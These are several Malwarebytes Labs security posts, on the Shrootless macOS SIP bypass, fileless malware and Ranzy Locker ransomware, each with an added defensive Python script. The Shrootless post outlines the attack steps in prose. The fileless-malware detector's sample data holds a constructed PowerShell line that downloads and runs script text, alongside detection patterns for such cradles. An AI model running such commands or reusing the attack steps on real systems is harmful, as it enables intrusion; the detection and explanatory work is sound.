The post The return of the Malwarebytes CrackMe appeared first on Malwarebytes Labs.

Shrootless: Microsoft finds Apple macOS vulnerability

Microsoft researchers have discovered a vulnerability in macOS, dubbed Shrootless, that can allow attackers to bypass System Integrity Protection (SIP) and perform malicious activities, such as gaining root privileges and installing rootkits on vulnerable devices.

Microsoft reported the Shrootless attack to Apple’s security team earlier this year, together with a proof-of-concept that showed how the bug could be abused to install a malicious kernel extension (rootkit).

What is SIP?

SIP, also known as “rootless”, is designed to lock down the system from root by leveraging the Apple sandbox to protect the entire platform. Being able to bypass SIP basically gives the attacker full control of the system, because they can run arbitrary code without the protection kicking in.

Step by step, Apple has hardened SIP over the years against attacks by improving and fine-tuning the restrictions. One of the most effective SIP restrictions is the filesystem restriction. Without these restrictions, an attacker would be able to access and drop files in an area of the file system that is not intended for application files. The amount of damage an attacker can do to a device’s critical components is directly based on their ability to write unrestricted data to disk.

Since the filesystem restrictions are so powerful, Apple had to implement some exceptions. One of those exceptions is the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.

The vulnerability

The Shrootless vulnerability could be used by an attacker to modify protected parts of the file system by abusing inherited permissions. Microsoft shared its findings with Apple through Coordinated Vulnerability Disclosure (CVD). The vulnerability exists in the macOS Big Sur and Monterey operating systems and was patched by Apple on October 25, 2021.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Shrootless is listed under CVE-2021-30892.

The researchers found that during the installation process of a new application, an attacker could hijack the installation process by creating a specially crafted post-installation script and placing it in the location where the installation process looks for the post-installation script.

The gritty details

The method to use this vulnerability is pretty straightforward.

  • Download an Apple-signed package (using wget) that is known to have a post-install script. When installing an Apple-signed package (.pkg file), the said package invokes system_installd, which then takes charge of installing it.
  • Plant a malicious /etc/zshenv that would check for its parent process. If it’s system_installd, then it would be able to write to restricted locations. If the package that is being installed contains any post-install scripts, system_installd runs them by invoking a default shell, which is zsh on macOS. Interestingly, when zsh starts, it looks for the file /etc/zshenv, and runs commands from that file automatically, if it exists.
  • Invoke the installer utility to install the package. This will invoke system_installd and because we used a package with a post-install script, zsh is invoked and executes the commands in the file we planted.

This way the Shrootless attack bypasses the SIP and effectively gives the attacker root access. As you will understand from this description the attacker will need some access to the system to begin with or they will not be able to plant the necessary /etc/zshenv.

Mitigation

The easiest and best way to avoid falling victim to this vulnerability is to update to macOS Big Sur 11.6.1 or better.
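Two things a defender can check on a fleet after reading the above: whether a host is at or above the patched release, and whether an /etc/zshenv exists that zsh would source for the shell system_installd spawns for post-install scripts. The script below is an added example, not Microsoft’s or Apple’s code; the etc_dir argument lets it run against a constructed directory instead of a live /etc, and the assumption that a stock macOS install ships no /etc/zshenv is ours, not the article’s.

```python
"""Audit helper for the Shrootless conditions described above (added example).

Checks the macOS version against the fixed release and inspects etc_dir/zshenv,
which zsh reads on every start, including the shell system_installd spawns.
"""
import os
import re
import stat
import tempfile

PATCHED_VERSION = (11, 6, 1)  # macOS Big Sur 11.6.1, the fix named in the article
# Heuristic: a zshenv that names system_installd or inspects its parent process
# is exactly the hook the article describes and deserves a look.
SUSPICIOUS = re.compile(r"system_installd|\$PPID|ps\s+-o\s+\S*comm", re.IGNORECASE)


def parse_version(text):
    """'11.6.1' -> (11, 6, 1); absent components count as zero."""
    parts = [int(p) for p in text.strip().split(".") if p.isdigit()]
    return tuple((parts + [0, 0, 0])[:3])


def is_patched(version_text):
    """True when the reported macOS version is 11.6.1 or later."""
    return parse_version(version_text) >= PATCHED_VERSION


def audit_zshenv(etc_dir="/etc"):
    """Return a list of findings about etc_dir/zshenv; an empty list means nothing odd."""
    path = os.path.join(etc_dir, "zshenv")
    findings = []
    if not os.path.exists(path):
        return findings  # assumption: a stock install has no /etc/zshenv
    findings.append("zshenv present")
    st = os.stat(path)
    if st.st_uid != 0:
        findings.append("zshenv not owned by root (uid %d)" % st.st_uid)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("zshenv writable by group or others")
    with open(path, "r", errors="replace") as fh:
        if SUSPICIOUS.search(fh.read()):
            findings.append("zshenv references system_installd or checks its parent process")
    return findings


def demo():
    """Run the audit against a constructed directory holding a mock zshenv."""
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "zshenv"), "w") as fh:
        # Constructed stand-in: only a comment naming the parent-process check, no payload.
        fh.write("# constructed: runs only when the parent is system_installd\n")
    return audit_zshenv(tmp)


if __name__ == "__main__":
    print(demo())
```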

Stay safe, everyone!

The post Shrootless: Microsoft finds Apple macOS vulnerability appeared first on Malwarebytes Labs.

What is fileless malware?

Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. The malicious payload exists in the computer’s memory, which means nothing is ever written directly to the hard drive.

For an attacker, fileless malware has two major advantages:

  • There is no file for traditional anti-virus software to detect.
  • There is nothing on the hard drive for forensics to discover.

As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. Which makes fileless malware a step forward in the arms race between malware and security products.

Is fileless malware new?

Fileless malware attacks have been around for 20 years at least. The first malware to be classified as fileless was the Code Red Worm, which ran rampant in 2001, attacking computers running Microsoft’s Internet Information Services (IIS).

But in the last few years fileless attacks have become more prevalent. Four years ago, the Ponemon Institute’s “The State of Endpoint Security Risk Report” reported that 77 percent of compromises in 2017 were fileless, and that fileless attacks were ten times more likely to succeed. We noted the trend ourselves, with an overview of fileless attacks in 2018.

How is fileless malware delivered?

In the case of the Code Red Worm, the malware exploited a buffer overflow vulnerability that allowed it to write itself directly into memory. Modern ransomware attacks sometimes rely on PowerShell commands that execute code stored on public websites like Pastebin or GitHub.

Fileless malware attacks have also been seen hiding their code inside existing benign files or invisible registry keys. Some use the so-called CactusTorch framework in a malicious document. And sometimes the malicious code does exist on a hard disk, just not on the one that belongs to the affected computer. For example, “USB thief” resides on infected USB devices installed as a plugin in popular portable software. It gathers information on the targeted system and writes that to the USB device.

How to create fileless malware

Our esteemed colleague Vasilios Hioureas has written a walk-through demonstrating some of his own fileless malware attacks. His write-up also nicely demonstrates what modern anti-malware solutions need to do to protect their users against fileless malware attacks: they must contain technology to dynamically detect malicious activity on the system rather than simply detecting malicious files. Old-school signature-based detection is useless when dealing with fileless malware.

What can fileless malware do?

In essence, fileless malware can do anything that “regular” malware can do, but for practical reasons you will often see that there is a limited amount of malicious, fileless code. For more complex programs like ransomware, the fileless malware might act as a dropper, which means the first stage downloads and executes the bigger program which is the actual payload. And, of course, fileless malware can use native, legitimate tools built into a system during a cyberattack.

The most common use cases for fileless malware are:

  • Initial access. The first step of a cyberattack is to gain a foothold on a system. This can be stealing credentials or exploiting a vulnerability in an access point.
  • Credential harvesting. Fileless malware is sometimes used to hunt for credentials, so an attacker can use alternative entry points or elevate their privileges.
  • Persistence. To ensure they have permanent access to a compromised system, an attacker might use fileless malware to create a backdoor.
  • Data exfiltration. An attacker might use fileless malware to hunt for useful information, such as a victim’s network configuration.
  • Dropper and/or payload. A dropper downloads and starts other malware (the payload) on a compromised system. The payload may come as a file, or it can be read from a remote server and loaded into memory directly.

Fileless malware detection

So, how can we find these fileless critters? Behavioral analysis and centralized management are key techniques for detecting and stopping fileless malware attacks. Knowing how to identify attacks and having an overview of the attack surface however is easier said than done.

What you need is anti-malware software that uses behavioral analysis, ideally supported by an Artificial Intelligence (AI) component. And for a large attack surface you will need something like a Security Information and Event Management (SIEM) system to tie all the alerts and detections together.

In short, detecting malware is no longer a matter of detecting malicious files, but more and more a matter of detecting malicious behavior.
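What “detecting malicious behavior” looks like in practice for the PowerShell download cradles mentioned above (script text pulled from Pastebin or GitHub and run in memory): an added example, not Malwarebytes’ detection logic. Input records are constructed dicts with "pid", "image" and "cmdline" keys standing in for Sysmon or EDR process-creation events; -EncodedCommand payloads (base64 of UTF-16LE) are decoded so the same rules apply to obfuscated invocations.

```python
"""Behavioural triage of process-creation records for PowerShell download cradles
(added example; records are constructed, a real deployment would feed EDR events)."""
import base64
import re

# Each rule is a (name, pattern) pair applied to the decoded command line.
RULES = [
    ("download_cradle", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I)),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("paste_or_raw_host", re.compile(r"pastebin\.com|raw\.githubusercontent\.com|gist\.github", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop\b|-noprofile\b", re.I)),
]
ENC_ARG = re.compile(r"-e(?:ncodedcommand|nc|c)?\b\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None when absent or malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_record(rec):
    """Return the names of the rules that fire for one process record."""
    if not rec.get("image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    text = rec.get("cmdline", "")
    hits = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        text = text + " " + decoded  # scan the plaintext too
    hits.extend(name for name, rx in RULES if rx.search(text))
    return hits


def triage(records, threshold=2):
    """Map pid -> hits for records where at least `threshold` rules fire."""
    flagged = {}
    for rec in records:
        hits = score_record(rec)
        if len(hits) >= threshold:
            flagged[rec["pid"]] = hits
    return flagged


def build_sample_records():
    """Constructed events: a benign script run, a plain cradle, an encoded cradle, a non-shell."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    cradle = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
    encoded = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    return [
        {"pid": 101, "image": ps, "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
        {"pid": 102, "image": ps, "cmdline": 'powershell.exe -nop -w hidden -c "%s"' % cradle},
        {"pid": 103, "image": ps, "cmdline": "powershell.exe -NoProfile -EncodedCommand " + encoded},
        {"pid": 104, "image": r"C:\Windows\notepad.exe", "cmdline": "notepad.exe readme.txt"},
    ]
```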

Stay safe, everyone!

The post What is fileless malware? appeared first on Malwarebytes Labs.

Threat profile: Ranzy Locker ransomware

Ranzy Locker ransomware emerged in late 2020, when the variant began to target victims in the United States. According to a flash alert issued by the FBI, unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021, including victims in the construction, academic, government, IT, and transportation sectors. Ranzy Locker is a successor of ThunderX and AKO ransomware.

Ransomware-as-a-Service 

The group behind Ranzy Locker is not very different in its business approach from other “big game” ransomware gangs. The ransomware is made available using the Ransomware-as-a-Service (RaaS) model, which allows the developers to profit from cybercriminal affiliates who deploy it against victims. It also runs a leak site where data stolen from victims who refuse to pay a ransom is published.

RDP again, and Exchange

Just as the business model is no surprise, neither are the attack methods that Ranzy Locker affiliates deploy to gain initial access. According to the same FBI alert, a majority of victims reported that the threat actors conducted brute force attacks targeting Remote Desktop Protocol (RDP) credentials to gain access to the victims’ networks. Recent targets reported the actors leveraged known Microsoft Exchange Server vulnerabilities and phishing as the means of compromising their networks.

Older, and now less frequent attack methods included malicious spam, and use of the RIG exploit kit, which was previously used to spread Princess ransomware. 

Recognizing Ranzy Locker 

So, how can you tell whether you have been hit by Ranzy Locker or one of the other, many, ransomware variants out there? Well, for starters you can tell from the header of the ransom note, which is named readme.txt:

---=== Ranzy Locker 1.1 ===---

Attention! Your network has been locked.
Your computers and server are locked now.
All encrypted files have extension: .ranzy

---- How to restore my files? ----

All files on each host in your network encrypted with strongest encryption algorithms
Backups are deleted or formatted, do not worry, we can help you restore your files

Files can be decrypted only with private key - this key stored on our servers
You have only one way for return your files back - contact us and receive universal decryption program

Do not worry about guarantees - you can decrypt any 3 files FOR FREE as guarantee

Some variants also use file extensions for the encrypted files that show Ranzy Locker was at work. Those extensions are .RNZ, .ranzy, and .RANZYLOCKED, but there are also some that are less helpful and add a random 6-character string.

Behavior 

A typical series of actions performed by Ranzy Locker ransomware is:

  • Find and delete shadow volume copies and other recent backups, and disable the Windows recovery environment.
  • Run the encryption process but skip files that have .exe, .dll, .sys, .ini, .lnk, .key, .rdp extensions; and exclude paths with strings including AppData, Boot, PerfLogs, PerfBoot, Intel, Microsoft, Windows and Tor Browser.
  • Look for connected machines on the network.
  • Drop the ransom note on the desktop of the affected system.

From what we have noticed, the double-extortion tactic—encrypting and exfiltrating data—is only used on some victims, probably depending on the size of the company and the type of data that was stolen. 
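A small host triage script for the indicators given in the Recognizing and Behavior sections above (the readme.txt header and the .RNZ, .ranzy and .RANZYLOCKED extensions), as an added example that is neither the FBI’s YARA rule nor Malwarebytes’ detection. It walks a directory tree and reports what it finds; build_demo_tree() creates a constructed tree in a temp directory so it runs offline, and the rule that a random 6-character extension only counts as a weak hit when a ransom note sits in the same folder is our assumption.

```python
"""Triage a directory tree for Ranzy Locker indicators (added example)."""
import os
import re
import tempfile

NOTE_NAME = "readme.txt"
NOTE_HEADER = "---=== Ranzy Locker"              # header quoted in the article
KNOWN_EXTS = {".rnz", ".ranzy", ".ranzylocked"}  # compared case-insensitively
RANDOM_EXT = re.compile(r"^\.[a-z0-9]{6}$")      # assumption: lowercase alphanumeric


def is_ranzy_note(path):
    """True if the file's first non-empty line carries the Ranzy Locker header."""
    try:
        with open(path, "r", errors="replace") as fh:
            for line in fh:
                if line.strip():
                    return line.strip().startswith(NOTE_HEADER)
    except OSError:
        pass
    return False


def triage_tree(root):
    """Return notes, known-extension files, weak hits and an overall verdict."""
    report = {"notes": [], "encrypted": [], "weak": []}
    for dirpath, _, files in os.walk(root):
        paths = [os.path.join(dirpath, n) for n in files]
        notes = [p for p in paths
                 if os.path.basename(p).lower() == NOTE_NAME and is_ranzy_note(p)]
        report["notes"].extend(notes)
        for p in paths:
            ext = os.path.splitext(p)[1]
            if ext.lower() in KNOWN_EXTS:
                report["encrypted"].append(p)
            elif notes and RANDOM_EXT.match(ext):
                report["weak"].append(p)  # random extension next to a note
    # A note or a known extension alone is enough to call it; weak hits add context.
    report["verdict"] = bool(report["notes"] or report["encrypted"])
    return report


def build_demo_tree():
    """Constructed victim-like tree in a temp directory; returns its root."""
    docs = os.path.join(tempfile.mkdtemp(), "Documents")
    os.makedirs(docs)
    with open(os.path.join(docs, NOTE_NAME), "w") as fh:
        fh.write("---=== Ranzy Locker 1.1 ===---\n\nAttention! Your network has been locked.\n")
    for name in ("q3.xlsx.ranzy", "plan.docx.RANZYLOCKED", "photo.jpg.ab12cd", "notes.txt"):
        with open(os.path.join(docs, name), "wb") as fh:
            fh.write(b"\x00" * 16)  # constructed filler, not real ciphertext
    return os.path.dirname(docs)


if __name__ == "__main__":
    print(triage_tree(build_demo_tree()))
```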

Mitigation 

Based on the behavior of Ranzy Locker, the FBI recommends the following mitigation strategies: 

  • Store regular backups of your data off-site and offline, where attackers can’t reach them.
  • Implement network segmentation, so that an attacker can’t reach all the machines on your network from one compromised foothold.
  • Install and regularly update anti-malware software on all hosts and enable real-time detection. 
  • Install security updates for software, operating systems, and firmware as soon as they are released.
  • Review domain controllers, servers, workstations, and Active Directory for new or unrecognized user accounts.
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
  • Disable unused remote access ports and monitor remote access logs for any unusual activity.  
  • Consider adding an email banner to emails received from outside your organization.  
  • Disable hyperlinks in received emails.
  • Use multi-factor authentication when logging into accounts or services.

We would like to add Brute Force Protection to that list. 

IOCs 

Besides the characteristics mentioned in this post, the FBI points to a sample YARA rule for Ranzy Locker, which can be found here.

Stay safe, everyone!

The post Threat profile: Ranzy Locker ransomware appeared first on Malwarebytes Labs.